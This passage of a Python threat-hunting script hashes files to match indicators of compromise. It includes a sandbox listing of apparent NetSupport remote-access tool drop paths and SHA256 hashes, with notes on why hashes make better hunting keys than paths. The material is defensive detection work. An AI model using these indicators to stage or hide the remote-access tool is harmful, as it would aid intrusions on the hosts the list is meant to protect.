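        m = HASH_RE.match(line)
        if m:
            pending[m.group(1)] = m.group(2).lower()
        else:
            flush()
            current = line
    flush()
    return list(by_sha.values())

def hunt(root: str, iocs: List[Ioc]) -> List[Tuple[str, str]]:
    """Hash every readable file under root; return (path, tag) for each SHA256 match."""
    wanted = {i.sha256: i.tag for i in iocs}
    hits = []
    for dirpath, _, names in os.walk(root):
        for n in names:
            p = os.path.join(dirpath, n)
            try:
                with open(p, "rb") as f:
                    digest = hashlib.sha256(f.read()).hexdigest()
            except OSError:
                continue  # locked or unreadable file: skip rather than abort the sweep
            if digest in wanted:
                hits.append((p, wanted[digest]))
    return hits

# Excerpt of the listing above (SHA1/SHA512 lines dropped for brevity).
LISTING = r"""
C:\Users\Admin\AppData\Roaming\IonicBaseband\client32.exe
SHA256 49a568f8ac11173e3a0d76cff6bc1d4b9bdf2c35c6d8570177422f142dcfdbe3
memory/2944-267-0x000000007EF70000-0x000000007EF80000-memory.dmp
C:\Users\Admin\AppData\Roaming\IonicBaseband\PCICL32.DLL
SHA256 63aa18c32af7144156e7ee2d5ba0fa4f5872a7deb56894f6f96505cbc9afe6f8
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
SHA256 8c2d4f119b4d5fa2ac1639a33717f1c086afd0154c524c21979868f04314455b
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
SHA256 5b7a0fce85b816dd25edcf6e2a0224ab18411c510ec769cddb7859f5dce52ace
\??\c:\Users\Admin\AppData\Local\Temp\beumlt25\beumlt25.cmdline
SHA256 55333cb538988a084f429900f2168606489020e5821a2ff47b02e18522fddce3
C:\Users\Admin\AppData\Roaming\IonicBaseband\PCICL32.dll
SHA256 63aa18c32af7144156e7ee2d5ba0fa4f5872a7deb56894f6f96505cbc9afe6f8
C:\Users\Admin\AppData\Roaming\IonicBaseband\client32.exe
SHA256 49a568f8ac11173e3a0d76cff6bc1d4b9bdf2c35c6d8570177422f142dcfdbe3
"""
```

Running parse_listing(LISTING) yields five records from eight entries: the repeated client32.exe collapses to one, the two PCICL32 spellings share one record, and the profile cache keeps two because its hash changed. Keying on the hash rather than the path is deliberate: the NetSupport components here are legitimately signed files whose names and drop directory vary between campaigns, while hunt() will still find them wherever they land; conversely the PowerShell cache files and the csc.exe compile leftovers are host-specific, so their hashes are evidence on this sandbox but poor hunting indicators, which is why the tag is carried alongside each hash.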